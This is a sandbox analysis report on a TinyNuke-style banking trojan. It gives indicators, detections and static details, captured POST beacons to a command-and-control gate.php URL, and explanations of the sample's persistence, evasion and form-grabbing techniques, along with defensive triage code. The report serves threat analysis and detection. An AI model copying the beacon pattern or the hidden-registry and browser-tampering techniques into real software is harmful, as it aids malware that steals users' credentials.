Maldun (魔盾) Security Analysis Report

Analysis type:    FILE
Start time:       2017-08-22 22:31:46
End time:         2017-08-22 22:34:10
Duration:         144 seconds
Engine version:   1.4-Maldun

VM name:          win7-sp1-x64-hpdapp03-1
Label:            win7-sp1-x64-hpdapp03-1
Hypervisor:       KVM
VM boot time:     2017-08-22 22:31:52
VM shutdown time: 2017-08-22 22:34:09

Maldun score

10.0

Family label: Generickdz

File details

File name:  1.exe
File size:  246784 bytes
File type:  PE32 executable (GUI) Intel 80386, for MS Windows
CRC32:      2701284A
MD5:        4e3b8920c730df878b149a30d35d7163
SHA1:       040a4158da904705b38fe7c943c7fc2d674da6e7
SHA256:     47cf31a80061edd87d99518298951f3a71ead96ec3153728f68199d6a0bc303f
SHA512:     379721672f7b0f869e9fa8fde5ebe9a1992ca1360d3779ab2309e78052aea78f185e4e18aa49c1e8ea7efedde3f5b09fe785ffe5e1b42a1c1c700c92a599999a
Ssdeep:     6144:tRnXlF9dSmU2D22k2222f2222H222282222w2222L2222A2222Z2222O2222fbmE:txXPGmU2D22k2222f2222H222282222t
PEiD:       no match
Yara:
  • IsPE32 ()
  • IsWindowsGUI ()
  • IsPacked (Entropy Check)
  • HasRichSignature (Rich Signature Check)
  • without_images (Rule to detect the no presence of any image)
  • without_attachments (Rule to detect the no presence of any attachment)
  • anti_dbg (Checks if being debugged)
  • win_files_operation (Affect private profile)
  • without_urls (Rule to detect the no presence of any url)
VirusTotal: report link (URL not included in this copy)
VirusTotal scan time: 2017-08-22 04:33:14
Detections: 46/64

Signatures

Allocates read-write-execute (RWX) memory
Drops a binary and executes it
binary: C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
Maldun wping.org IP reputation system
greylisted: 195.2.252.59
HTTP traffic shows features typical of malware
post_no_referer: HTTP traffic contains a POST request with no referer header
post_no_useragent: HTTP traffic contains a POST request with no user-agent header
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://195.2.252.59/PANEL/gate.php?94D355F270963256450765
Performs HTTP requests
url: http://195.2.252.59/PANEL/gate.php?94D355F270963256450765
Binary may contain encrypted or compressed data
section: name: .rsrc, entropy: 7.41, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00024e00, virtual_size: 0x00024d4d
Forces a created process to be loaded as the child of an unrelated process
Executes a process and injects code into it (probably during unpacking)
Attempts to disable SPDY in Firefox, which makes interception of browser traffic (form grabbing) easier
Attempts to remove evidence that the file was downloaded from the Internet (deletes the Zone.Identifier alternate data stream)
file: C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe:Zone.Identifier
Deletes its original binary from disk
Attempts to delay the analysis task with a long sleep
Process: dllhost.exe tried to sleep 5160 seconds, actually delayed analysis time by 0 seconds
(dllhost.exe, PID 2616, is a child of the malware's second-stage process, PID 2376, in the process list below; the sleep therefore comes from code running inside dllhost.exe, and the sandbox skipped the delay.)
Creates a registry key or value whose name contains a null character so that Registry Editor cannot display it
keyval: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe3\x9c\xb0
keyval: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe6\x95\xb2
keyval: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xd0\x80
keyval: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xc3\x84
(Each value name starts with a NUL byte, followed by the bot ID 94D355F270963256450765 and one trailing non-ASCII character; the escaped bytes appear to be the UTF-8 form of the wide name. Win32 Reg* APIs and regedit treat a value name as a NUL-terminated string and so see an empty name, whereas the native NtSetValueKey, which this sample resolves at runtime, takes a counted UNICODE_STRING and writes the full name. All four values point at the same dropped executable.)
Harvests information from local web browsers
file: C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\i072kp8z.default-1494515848972\prefs.js
file: C:\Users\test\AppData\Roaming\Mozilla\Firefox\profiles.ini
Installs itself in the Windows startup (Run) key
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe3\x9c\xb0
data: C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe6\x95\xb2
data: C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xd0\x80
data: C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xc3\x84
data: C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
Contacts a C&C server over HTTP (banking trojan)
url: http://195.2.252.59/PANEL/gate.php?94D355F270963256450765
Creates a copy of itself
copy: C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
Attempts to disable browser security warnings
key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner
Generates suspicious network traffic, possibly used for malicious activity
signature: ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad
signature: ET TROJAN Trojan Generic - POST To gate.php with no accept headers
signature: ET TROJAN Trojan Generic - POST To gate.php with no referer
("Zbot" in the first rule name is a generic gate.php heuristic, not a family determination. The engines below that name a family (DrWeb Trojan.TinyNuke.9, Microsoft TrojanSpy:Win32/Tinukebot.A!bit) point to TinyNuke, which is consistent with the Firefox prefs.js modification and the Internet Explorer protected-mode changes seen in this run.)
Detected as malicious by at least ten antivirus engines on VirusTotal
MicroWorld-eScan: Trojan.GenericKDZ.40157
McAfee: RDN/Generic.hbg
Cylance: Unsafe
VIPRE: Trojan.Win32.Generic!BT
K7AntiVirus: Trojan ( 00514d6a1 )
K7GW: Trojan ( 00514d6a1 )
Invincea: heuristic
Baidu: Win32.Trojan.WisdomEyes.16070401.9500.9996
Cyren: W32/Trojan.JIRZ-1385
Symantec: Trojan.Gen.2
ESET-NOD32: a variant of Win32/Kryptik.FVRV
TrendMicro-HouseCall: Suspicious_GEN.F47V0820
Avast: Win32:Malware-gen
Kaspersky: HEUR:Trojan.Win32.Generic
BitDefender: Trojan.GenericKDZ.40157
Paloalto: generic.ml
ViRobot: Trojan.Win32.Z.Agent.246784.EL
Rising: Malware.Obscure/Heur!1.A89E (cloud:tDR9ZW8vmaK)
Ad-Aware: Trojan.GenericKDZ.40157
Sophos: Mal/Generic-S
Comodo: UnclassifiedMalware
F-Secure: Trojan.GenericKDZ.40157
DrWeb: Trojan.TinyNuke.9
McAfee-GW-Edition: BehavesLike.Win32.Downloader.dc
Emsisoft: Trojan.GenericKDZ.40157 (B)
SentinelOne: static engine - malicious
Webroot: W32.Trojan.Gen
Avira: TR/Crypt.Xpack.sjvei
Fortinet: W32/ETap.A
Antiy-AVL: Trojan/Win32.TSGeneric
Endgame: malicious (high confidence)
Arcabit: Trojan.Generic.D9CDD
AegisLab: Troj.W32.Generic!c
ZoneAlarm: HEUR:Trojan.Win32.Generic
Microsoft: TrojanSpy:Win32/Tinukebot.A!bit
AhnLab-V3: Trojan/Win32.MDA.R207046
ALYac: Trojan.GenericKDZ.40157
AVware: Trojan.Win32.Generic!BT
MAX: malware (ai score=84)
Malwarebytes: Trojan.MalPack
Tencent: Win32.Trojan.Inject.Auto
Ikarus: Trojan.Win32.Crypt
GData: Trojan.GenericKDZ.40157
AVG: Win32:Malware-gen
Panda: Trj/CI.A
CrowdStrike: malicious_confidence_60% (W)

Screenshots

(none included in this copy)

Network analysis

Hosts contacted

IP address     Country             Access
195.2.252.59   Russian Federation  direct, by IP address (no DNS lookup)

TCP connections

IP address     Port  Connections
195.2.252.59   80    36 (every request carries Connection: close, so each exchange opens a new TCP connection)

HTTP requests

All four captured requests go to the same gate.php URL, keyed by the bot ID 94D355F270963256450765 in the query string. None carries a User-Agent, Accept or Referer header, the Content-type is text/html on a POST, and the declared bodies are 9, 36 and 4 bytes (the first request has no Content-Length). Request bodies are not shown in this report.

URL / HTTP data
http://195.2.252.59/PANEL/gate.php?94D355F270963256450765
POST /PANEL/gate.php?94D355F270963256450765 HTTP/1.1
Host: 195.2.252.59
Pragma: no-cache
Content-type: text/html
Connection: close

http://195.2.252.59/PANEL/gate.php?94D355F270963256450765
POST /PANEL/gate.php?94D355F270963256450765 HTTP/1.1
Host: 195.2.252.59
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length: 9

http://195.2.252.59/PANEL/gate.php?94D355F270963256450765
POST /PANEL/gate.php?94D355F270963256450765 HTTP/1.1
Host: 195.2.252.59
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length: 36

http://195.2.252.59/PANEL/gate.php?94D355F270963256450765
POST /PANEL/gate.php?94D355F270963256450765 HTTP/1.1
Host: 195.2.252.59
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length: 4
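A small triage routine for the request heads above, as an added example (not code from the report, from Maldun or from the Emerging Threats ruleset). It reimplements the heuristics the report's signatures express: a POST to a dotted-quad host, a gate.php path, missing User-Agent/Referer/Accept headers, and a text/html Content-Type on a POST. The four request heads in REPORT_REQUESTS are copied from the HTTP section above; BENIGN_REQUEST is constructed for contrast and example.com is a placeholder host.

```python
"""Heuristic triage of captured HTTP request heads, modelled on the
post_no_referer / post_no_useragent / ip_hostname signatures and the
ET "POST to gate.php" rules in this report.  Added example; not code from
the report, Maldun or the ET ruleset.  REPORT_REQUESTS are the four request
heads from the report; BENIGN_REQUEST is constructed (example.com is a
placeholder)."""
import ipaddress
import re

_REPORT_HEAD = ("POST /PANEL/gate.php?94D355F270963256450765 HTTP/1.1\r\n"
                "Host: 195.2.252.59\r\nPragma: no-cache\r\n"
                "Content-type: text/html\r\nConnection: close\r\n")
REPORT_REQUESTS = [
    _REPORT_HEAD,
    _REPORT_HEAD + "Content-Length: 9\r\n",
    _REPORT_HEAD + "Content-Length: 36\r\n",
    _REPORT_HEAD + "Content-Length: 4\r\n",
]
BENIGN_REQUEST = ("POST /login HTTP/1.1\r\nHost: example.com\r\n"
                  "User-Agent: Mozilla/5.0\r\nAccept: text/html\r\n"
                  "Referer: https://example.com/\r\n"
                  "Content-Type: application/x-www-form-urlencoded\r\n"
                  "Content-Length: 27\r\n")

GATE_RE = re.compile(r"/gate\.php(?:\?|$)")


def parse_request(raw: str) -> dict:
    """Split a request head into method, path, version and a lower-cased
    header map.  Only the head is parsed; bodies were not captured."""
    lines = [l for l in raw.splitlines() if l.strip()]
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers}


def is_dotted_quad(host: str) -> bool:
    """True when the Host header is a bare IPv4 address (optionally :port)."""
    try:
        ipaddress.IPv4Address(host.split(":")[0])
        return True
    except ValueError:
        return False


def triage(raw: str) -> list[str]:
    """Return the heuristics a request head trips; empty for a clean one."""
    req = parse_request(raw)
    h = req["headers"]
    hits = []
    if req["method"] != "POST":
        return hits                      # every rule below is POST-specific
    if is_dotted_quad(h.get("host", "")):
        hits.append("ip_hostname")
    if GATE_RE.search(req["path"]):
        hits.append("gate_php_path")
    for name in ("user-agent", "referer", "accept"):
        if name not in h:
            hits.append("post_no_" + name.replace("-", ""))
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype == "text/html":
        hits.append("html_content_type_on_post")   # browsers do not send this on form posts
    return hits


def triage_all(requests: list[str]) -> dict[int, list[str]]:
    """Index -> hit list, for a batch of request heads."""
    return {i: triage(r) for i, r in enumerate(requests)}


if __name__ == "__main__":
    for i, hits in triage_all(REPORT_REQUESTS).items():
        print(i, hits)
    print("benign", triage(BENIGN_REQUEST))
```

Each of the four report requests trips all six heuristics; the constructed browser-style POST trips none. The Content-Length values are deliberately ignored: short bodies are characteristic of beacons but are too weak on their own to act on.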

Static analysis

PE information

Image base:             0x00400000
Entry point:            0x00407af7
Declared checksum:      0x00000000 (not filled in by the linker)
Computed checksum:      0x0004b71f
Minimum OS version:     5.1
Compile timestamp:      2017-08-19 09:47:42 (three days before the analysis)
Import hash (imphash):  498a29e746d9b5cb412502a979c3111d
Icon
Icon exact hash:        98e88cb282db09638e9776a65401f90c
Icon similarity hash:   e6139b3f8d1b730f1afd1ee873e2dc4b

Version information

LegalCopyright: Copyright (C) 2017
FileVersion: 1, 0, 0, 1
ProductVersion: 1, 0, 0, 1
Translation: 0x0000 0x04b0

PE sections

Name    Virtual address  Virtual size  Raw size    Characteristics                                                            Entropy
.text   0x00001000       0x00013f0c    0x00014000  IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ                6.38
.data   0x00015000       0x00003e60    0x00001400  IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE      3.66
.idata  0x00019000       0x000009b6    0x00000a00  IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ                          5.33
.rsrc   0x0001a000       0x00024d4d    0x00024e00  IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ                          7.41
.reloc  0x0003f000       0x00001224    0x00001400  IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 6.25

The .rsrc section accounts for 0x24e00 (151040) of the 246784 file bytes, about 61%, at an entropy of 7.41; that, not the code section, is where the packed content lives.

Resources

Name           Offset      Size        Language      Sublanguage      Entropy  File type
GQDPIW         0x0001a518  0x000071ed  LANG_NEUTRAL  SUBLANG_NEUTRAL  7.99     data
RT_BITMAP      0x0002f280  0x00003668  LANG_NEUTRAL  SUBLANG_NEUTRAL  6.27     data  (same entry listed 5 times in the original report)
RT_ICON        0x0003a150  0x00004228  LANG_NEUTRAL  SUBLANG_NEUTRAL  6.67     data  (same entry listed 10 times)
RT_MENU        0x0003e780  0x00000218  LANG_NEUTRAL  SUBLANG_NEUTRAL  3.29     data  (same entry listed 3 times)
RT_GROUP_ICON  0x0003ea10  0x00000022  LANG_NEUTRAL  SUBLANG_NEUTRAL  2.45     MS Windows icon resource - 2 icons, 32x32  (listed twice)
RT_VERSION     0x0003ea34  0x0000019c  LANG_NEUTRAL  SUBLANG_NEUTRAL  3.16     data
RT_MANIFEST    0x0003ebd0  0x0000017d  LANG_NEUTRAL  SUBLANG_NEUTRAL  4.91     XML 1.0 document text

The custom-named resource GQDPIW (0x71ed bytes, entropy 7.99, close to the 8.0 maximum) is the only resource that looks encrypted or compressed and is the likeliest carrier of the payload that is later written into a second process.
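The two static checks the report relies on here ("IsPacked (Entropy Check)" and the high-entropy .rsrc finding) are simple enough to reproduce. The following is an added example, not code from the report or from Maldun: a Shannon-entropy function and a per-section review of the PE table. REPORT_SECTIONS is the section table from this report; the sample's bytes are not available, so the entropy function is demonstrated on constructed buffers.

```python
"""Shannon entropy and a per-section PE review, reproducing the static checks
behind "IsPacked (Entropy Check)" and "Binary may contain encrypted or
compressed data".  Added example, not code from the report or from Maldun.
REPORT_SECTIONS is copied from the report's section table; sample bytes are
not available, so shannon_entropy is exercised on constructed data."""
import math

FILE_SIZE = 246784                        # 1.exe, from the file details
REPORT_SECTIONS = """\
.text 0x00001000 0x00013f0c 0x00014000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.38
.data 0x00015000 0x00003e60 0x00001400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 3.66
.idata 0x00019000 0x000009b6 0x00000a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.33
.rsrc 0x0001a000 0x00024d4d 0x00024e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 7.41
.reloc 0x0003f000 0x00001224 0x00001400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 6.25
"""


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(table: str) -> list[dict]:
    """Parse rows of 'name va vsize rawsize characteristics entropy'."""
    rows = []
    for line in table.splitlines():
        name, va, vsize, rawsize, chars, ent = line.split()
        rows.append({"name": name, "va": int(va, 16),
                     "virtual_size": int(vsize, 16), "raw_size": int(rawsize, 16),
                     "chars": set(chars.split("|")), "entropy": float(ent)})
    return rows


def review_sections(sections: list[dict], file_size: int,
                    entropy_threshold: float = 7.0) -> list[tuple[str, list[str]]]:
    """Flag sections that look like packed or encrypted payload carriers:
    near-maximal entropy, a non-code section holding most of the file, or a
    section that is both writable and executable."""
    flagged = []
    for s in sections:
        reasons = []
        if s["entropy"] >= entropy_threshold:
            reasons.append("high_entropy")
        if "IMAGE_SCN_CNT_CODE" not in s["chars"] and s["raw_size"] / file_size > 0.5:
            reasons.append("data_section_dominates_file")
        if {"IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_WRITE"} <= s["chars"]:
            reasons.append("writable_and_executable")
        if reasons:
            flagged.append((s["name"], reasons))
    return flagged


if __name__ == "__main__":
    print(review_sections(parse_sections(REPORT_SECTIONS), FILE_SIZE))
    print(shannon_entropy(bytes(range(256)) * 4), shannon_entropy(b"\x00" * 1000))
```

On this report's table only .rsrc is flagged, on both counts. The 7.0 threshold is the usual rule of thumb for "probably compressed or encrypted"; legitimate resource sections holding PNG icons can also score high, so the size ratio is the more useful second signal.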

Imports

The static import table is small: C runtime support plus a handful of USER32, GDI32 and SHELL32 functions. The capabilities that matter (process injection, sockets, registry writes, screen capture) appear only in the list of APIs resolved at runtime under Behavioural analysis below.

Library KERNEL32.dll:
0x41901c - GetModuleHandleA
0x419020 - FindAtomW
0x419024 - CreateFileW
0x419028 - FlushFileBuffers
0x41902c - GetStringTypeW
0x419030 - AddAtomW
0x419034 - SetStdHandle
0x419038 - OutputDebugStringW
0x41903c - LCMapStringW
0x419040 - GetProcAddress
0x419044 - GetLastError
0x419048 - lstrlenW
0x41904c - GetTickCount
0x419050 - WriteConsoleOutputCharacterW
0x419054 - WriteConsoleW
0x419058 - FillConsoleOutputCharacterA
0x41905c - HeapReAlloc
0x419060 - EncodePointer
0x419064 - DecodePointer
0x419068 - GetCommandLineA
0x41906c - RaiseException
0x419070 - RtlUnwind
0x419074 - IsDebuggerPresent
0x419078 - IsProcessorFeaturePresent
0x41907c - ExitProcess
0x419080 - GetModuleHandleExW
0x419084 - MultiByteToWideChar
0x419088 - WideCharToMultiByte
0x41908c - HeapSize
0x419090 - HeapFree
0x419094 - HeapAlloc
0x419098 - SetLastError
0x41909c - GetCurrentThreadId
0x4190a0 - GetProcessHeap
0x4190a4 - GetStdHandle
0x4190a8 - GetFileType
0x4190ac - DeleteCriticalSection
0x4190b0 - GetStartupInfoW
0x4190b4 - GetModuleFileNameA
0x4190b8 - WriteFile
0x4190bc - GetModuleFileNameW
0x4190c0 - QueryPerformanceCounter
0x4190c4 - GetCurrentProcessId
0x4190c8 - GetSystemTimeAsFileTime
0x4190cc - GetEnvironmentStringsW
0x4190d0 - FreeEnvironmentStringsW
0x4190d4 - UnhandledExceptionFilter
0x4190d8 - SetUnhandledExceptionFilter
0x4190dc - InitializeCriticalSectionAndSpinCount
0x4190e0 - Sleep
0x4190e4 - GetCurrentProcess
0x4190e8 - TerminateProcess
0x4190ec - TlsAlloc
0x4190f0 - TlsGetValue
0x4190f4 - TlsSetValue
0x4190f8 - TlsFree
0x4190fc - GetModuleHandleW
0x419100 - EnterCriticalSection
0x419104 - LeaveCriticalSection
0x419108 - GetConsoleCP
0x41910c - GetConsoleMode
0x419110 - SetFilePointerEx
0x419114 - IsValidCodePage
0x419118 - GetACP
0x41911c - GetOEMCP
0x419120 - GetCPInfo
0x419124 - LoadLibraryExW
0x419128 - CloseHandle
Library USER32.dll:
0x419140 - LoadBitmapA
0x419144 - LoadIconA
0x419148 - GetRawInputBuffer
0x41914c - GetCaretPos
0x419150 - RegisterRawInputDevices
0x419154 - LoadImageA
0x419158 - LoadKeyboardLayoutA
0x41915c - LoadCursorA
0x419160 - LoadCursorFromFileA
0x419164 - LoadAcceleratorsA
Library GDI32.dll:
0x419000 - CopyEnhMetaFileA
0x419004 - GetEnhMetaFileHeader
0x419008 - CombineRgn
0x41900c - ColorMatchToTarget
0x419010 - CombineTransform
0x419014 - ColorCorrectPalette
Library SHELL32.dll:
0x419130 - ShellAboutA
0x419134 - DragQueryFileW
0x419138 - FindExecutableA

Dropped files

94D355F270963256450765

File name: 94D355F270963256450765
Paths
  • C:\Users\test\AppData\Local\Temp\94D355F270963256450765
File size: 38 bytes
File type: ASCII text, with no line terminators
MD5: 65049f4c4c1aa9b8aeb988d0619ded8a
SHA1: 0da4845b935838efc0afcfe75b10e5724eaa60c3
SHA256: 10f748895d50d4f3174f5b77ae42a932606592694ccafcc3edf0c8e877ba4c52
SHA512: 1da5d7b8579b4909f892a71e53563de621a1ed3a406c2a5afd699bd2f050c32baa325264020e151ce913267608a27530b79e0e12f4e14baa9240084b62411987
Ssdeep: 3:oNmWfkiE2J5xAImACn:oNm+kn23fyn
VirusTotal: search related analyses
(Created, read, modified and deleted again during the run; its content is not shown in this report.)

94D355F270963256450765.exe

File name: 94D355F270963256450765.exe
Paths
  • C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
File size: 246784 bytes
File type: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: 4e3b8920c730df878b149a30d35d7163
SHA1: 040a4158da904705b38fe7c943c7fc2d674da6e7
SHA256: 47cf31a80061edd87d99518298951f3a71ead96ec3153728f68199d6a0bc303f
SHA512: 379721672f7b0f869e9fa8fde5ebe9a1992ca1360d3779ab2309e78052aea78f185e4e18aa49c1e8ea7efedde3f5b09fe785ffe5e1b42a1c1c700c92a599999a
Ssdeep: 6144:tRnXlF9dSmU2D22k2222f2222H222282222w2222L2222A2222Z2222O2222fbmE:txXPGmU2D22k2222f2222H222282222t
Yara
  • IsPE32 ()
  • IsWindowsGUI ()
  • IsPacked (Entropy Check)
  • HasRichSignature (Rich Signature Check)
  • without_images (Rule to detect the no presence of any image)
  • without_attachments (Rule to detect the no presence of any attachment)
  • anti_dbg (Checks if being debugged)
  • win_files_operation (Affect private profile)
  • without_urls (Rule to detect the no presence of any url)
VirusTotal: search related analyses
(Byte-identical to the submitted 1.exe: same size and hashes. The original in %TEMP% is deleted after the copy is started.)

94D355F27096325645076532

File name: 94D355F27096325645076532
Paths
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076532
File size: 62464 bytes
File type: data
MD5: 731bab3d3508aa0869f0342a9aa11467
SHA1: 282d224b57ab4a35d687e33068b940179b9462ba
SHA256: fe82efee93de3a80e9854454877c8f4daa2b95c1286b075bc7981a32ae334c12
SHA512: bac605f21d6dee06b4a133ac3c7159356162a074e78624e163ee54ae0ff069dfc9fa0f85ca5290afccb0a16a8a73de67773eb8f35327670658f95b386b5bccdb
Ssdeep: 1536:02kWr0SOTOKvxfWtn9Hc01Ry6snFLGy5z695uCQDP:02k/SYOIxfKH1DsnFLGwzc5u3
VirusTotal: search related analyses

94D355F27096325645076564

File name: 94D355F27096325645076564
Paths
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076564
File size: 47616 bytes
File type: data
MD5: 41791bdffdc74441046c87471d4e0091
SHA1: 3cb7569e4683882f6f500eaf6d27f485b27f2ac3
SHA256: e9888ee3f8bae9be5872ed965446ae2f52ce1eca2dd3db9deec1a28a6e286983
SHA512: 5fa4b06c8f3e9437ab9e78a2894095bd66869842a1fd005c51beb3a12bdfa82fc4eaeff524f90f71f5ffe5d12177ac2bfd2e540b722bf378ace079afdb5a3829
Ssdeep: 768:Yx4Wh2GZ+FX+qXpiEGiyJcl1bfNRjcOOVyE2yy5rUmz06LmZ61034AWeAJrGZrop:Yx4WIGZ+Yq3GAXNsyExCrRn1npegrGZq
VirusTotal: search related analyses
(The two files above are the bot ID with a 32 and a 64 suffix and are written, read and modified but not identified by the sandbox. The suffixes, together with the runtime resolution of IsWow64Process and GetNativeSystemInfo, suggest 32-bit and 64-bit variants of a module, but that is not confirmed by this report.)

prefs.js

File name: prefs.js
Paths
  • C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\i072kp8z.default-1494515848972\prefs.js
File size: 19089 bytes
File type: ASCII text, with very long lines, with CRLF line terminators
MD5: d4161f93e43e4f9423c9bf8e0e684b0b
SHA1: b8ba7dd66d06b0f3e79fd311282776642394b8b5
SHA256: d2a3dffffcf6fe4196b3c1a75d0b3d62932f971ec81c8b3e20def295d5f978cf
SHA512: b94ed1c1d6fb501bd38b7fb8368760f19bdc4eee9454901cbf5ae56618738992eaa50c3b87ee99062149eebdf663c8220f7299897db9a7aca781e5f00e525dc5
Ssdeep: 192:VHzTgv5+adaIMC6EMJu6w1tF1xKRVD5+jzYfY76D1hWZz87l8z9BgHfivGIPD:NXs1tFjKH4jkQicZzOle9BofwGSD
Yara
  • without_images (Rule to detect the no presence of any image)
  • without_attachments (Rule to detect the no presence of any attachment)
  • with_urls (Rule to detect the presence of an or several urls)
VirusTotal: search related analyses
(The Firefox profile's preferences file, listed because the sample wrote to it; see the SPDY signature above.)

Behavioural analysis

Mutexes
  • 94D355F270963256450765
Commands executed
  • "C:\Users\test\AppData\Local\Temp\1.exe"
  • "C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe"
Services created: none
Services started: none

The same 22-character ID, 94D355F270963256450765, is reused as the mutex name, the drop directory and file name, the hidden Run value name and the gate.php query string, so it is presumably a per-build or per-victim identifier.

Processes

1.exe  PID 1588, parent PID 1144  (the submitted sample)
└─ 1.exe  PID 2064, parent PID 1588  (second instance of the sample; the injection target reported in the signatures)
   └─ 94D355F270963256450765.exe  PID 2316, parent PID 2064  (the dropped copy in %APPDATA%)
      └─ 94D355F270963256450765.exe  PID 2376, parent PID 2316  (second instance of the copy)
         └─ dllhost.exe  PID 2616, parent PID 2376  (system binary started by the malware; the 5160-second sleep was observed here)

Files accessed
  • C:\Users\test\AppData\Local\Temp\apfHQ
  • C:\
  • C:\Users\test\AppData\Local\Temp\94D355F270963256450765
  • C:\Users\test\AppData\Roaming\94D355F270963256450765
  • C:\Users\test\AppData\Local\Temp\1.exe
  • C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
  • C:\Users\test\AppData\Roaming\Mozilla\Firefox\profiles.ini
  • C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\i072kp8z.default-1494515848972\prefs.js
  • C:\Windows\Globalization\Sorting\sortdefault.nls
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076532
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076564
  • C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe:Zone.Identifier
Files read
  • C:\Users\test\AppData\Local\Temp\1.exe
  • C:\Users\test\AppData\Roaming\Mozilla\Firefox\profiles.ini
  • C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\i072kp8z.default-1494515848972\prefs.js
  • C:\Windows\Globalization\Sorting\sortdefault.nls
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076532
  • C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076564
  • C:\Users\test\AppData\Local\Temp\94D355F270963256450765
Files written
  • C:\Users\test\AppData\Local\Temp\94D355F270963256450765
  • C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
  • C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\i072kp8z.default-1494515848972\prefs.js
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076532
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076564
Files deleted
  • C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe:Zone.Identifier
  • C:\Users\test\AppData\Local\Temp\1.exe
  • C:\Users\test\AppData\Local\Temp\94D355F270963256450765
Registry keys accessed
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe3\x9c\xb0
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xc3\x84
